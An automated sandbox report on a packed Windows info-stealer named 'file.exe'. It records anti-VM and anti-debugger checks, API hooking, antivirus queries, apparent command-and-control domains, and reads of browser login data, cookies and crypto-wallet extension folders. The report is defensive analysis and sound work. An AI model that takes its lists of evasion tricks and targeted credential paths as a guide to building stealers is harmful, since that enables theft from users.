                Source: file.exe, 00000000.00000003.1782165046.00000000040EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: file.exe, 00000000.00000003.1782165046.00000000040EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: file.exe, 00000000.00000003.1782165046.00000000040EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: file.exe, 00000000.00000003.1782165046.00000000040EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: file.exe, 00000000.00000003.1782165046.00000000040EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownHTTPS traffic detected: 104.21.95.235:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.95.235:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.95.235:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.95.235:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.95.235:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.95.235:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.95.235:443 -> 192.168.2.4:49736 version: TLS 1.2

                System Summary

                barindex
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01A368060_3_01A36806
                Source: file.exeStatic PE information: Number of sections : 14 > 10
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: ZLIB complexity 0.9988519799618321
                Source: file.exeStatic PE information: Section: ZLIB complexity 0.9963727678571429
                Source: file.exeStatic PE information: Section: ZLIB complexity 1.0071614583333333
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exe, 00000000.00000003.1734400395.0000000003FC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: file.exeReversingLabs: Detection: 65%
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: file.exeStatic file information: File size 5784576 > 1048576
                Source: file.exeStatic PE information: Raw size of .boot is bigger than: 0x100000 < 0x222a00
                Source: file.exeStatic PE information: Raw size of .vmp is bigger than: 0x100000 < 0x136a00
                Source: file.exeStatic PE information: Raw size of .vmp is bigger than: 0x100000 < 0x148800
                Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: file.exe, 00000000.00000002.1887809972.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp
                Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .vmp
                Source: file.exeStatic PE information: section name: .themida
                Source: file.exeStatic PE information: section name: .boot
                Source: file.exeStatic PE information: section name: .vmp
                Source: file.exeStatic PE information: section name: .vmp
                Source: file.exeStatic PE information: section name: .vmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01A1A7B9 push esp; ret 0_3_01A1A7BD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01A1C390 pushfd ; ret 0_3_01A1C39D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01A4C14B push 8001A4CCh; ret 0_3_01A4C171
                Source: file.exeStatic PE information: section name: entropy: 7.976313830582199
                Source: file.exeStatic PE information: section name: entropy: 7.741263846996405
                Source: file.exeStatic PE information: section name: .vmp entropy: 7.78426522776504
                Source: file.exeStatic PE information: section name: .vmp entropy: 7.883575468586369

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Users\user\Desktop\file.exeMemory written: PID: 6956 base: 15E0005 value: E9 2B BA 8E 75 Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: PID: 6956 base: 76ECBA30 value: E9 DA 45 71 8A Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: PID: 6956 base: 15F0008 value: E9 8B 8E 92 75 Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: PID: 6956 base: 76F18E90 value: E9 80 71 6D 8A Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: PID: 6956 base: 18E0005 value: E9 8B 4D 31 74 Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: PID: 6956 base: 75BF4D90 value: E9 7A B2 CE 8B Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: PID: 6956 base: 1940005 value: E9 EB EB 2C 74 Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: PID: 6956 base: 75C0EBF0 value: E9 1A 14 D3 8B Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: PID: 6956 base: 1950005 value: E9 8B 8A 68 73 Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: PID: 6956 base: 74FD8A90 value: E9 7A 75 97 8C Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: PID: 6956 base: 1960005 value: E9 2B 02 6A 73 Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: PID: 6956 base: 75000230 value: E9 DA FD 95 8C Jump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeAPI/Special instruction interceptor: Address: 1309239
                Source: C:\Users\user\Desktop\file.exeAPI/Special instruction interceptor: Address: 12EF8E9
                Source: C:\Users\user\Desktop\file.exeAPI/Special instruction interceptor: Address: 1313C8C
                Source: C:\Users\user\Desktop\file.exeAPI/Special instruction interceptor: Address: 12CB435
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7008Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: file.exe, 00000000.00000003.1875009517.0000000001A47000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1831258871.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1709540938.0000000001A4B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1890130414.0000000001A48000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1874448498.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804616185.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1885745267.0000000001A48000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1886997867.0000000001A48000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732330812.0000000001A46000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1809947662.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1831453164.0000000001A47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                Source: file.exe, file.exe, 00000000.00000003.1875009517.0000000001A47000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1831258871.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1889925037.0000000001A02000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1709540938.0000000001A4B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1890130414.0000000001A48000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1885745267.0000000001A02000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1874448498.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804616185.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1885745267.0000000001A48000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1886997867.0000000001A48000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732330812.0000000001A46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000003.1683673754.0000000001990000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: \SystemRoot\system32\ntkrnlmp.exeST\VBOX__
                Source: file.exe, 00000000.00000003.1683756064.0000000001990000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: \SystemRoot\system32\ntkrnmp.exeSDT\VBOX__
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugObjectHandleJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: file.exe, 00000000.00000003.1683882185.0000000001990000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: debonairnukk.xyz
                Source: file.exe, 00000000.00000003.1683882185.0000000001990000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: diffuculttan.xyz
                Source: file.exe, 00000000.00000003.1683882185.0000000001990000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: effecterectz.xyz
                Source: file.exe, 00000000.00000003.1683882185.0000000001990000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: deafeninggeh.biz
                Source: file.exe, 00000000.00000003.1683882185.0000000001990000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: immureprech.biz
                Source: file.exe, 00000000.00000003.1683882185.0000000001990000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: hypothesizys.click
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: file.exe, file.exe, 00000000.00000003.1831160416.0000000003FDC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1874634736.0000000001A2B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1890130414.0000000001A2F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1886997867.0000000001A2D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1831258871.0000000001AAC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1831258871.0000000001A2F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1891258863.0000000003FDC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1885745267.0000000001A2B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1848233635.0000000003FDC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1886687617.0000000001A2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6956, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: file.exeString found in binary or memory: Wallets/Electrum-LTC
                Source: file.exeString found in binary or memory: Wallets/ElectronCash
                Source: file.exeString found in binary or memory: window-state.json
                Source: file.exeString found in binary or memory: Jaxx Liberty
                Source: file.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: file.exeString found in binary or memory: ExodusWeb3
                Source: file.exeString found in binary or memory: Wallets/Ethereum
                Source: file.exe, 00000000.00000003.1810057731.0000000001A95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: file.exe, 00000000.00000003.1809906220.0000000001A0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
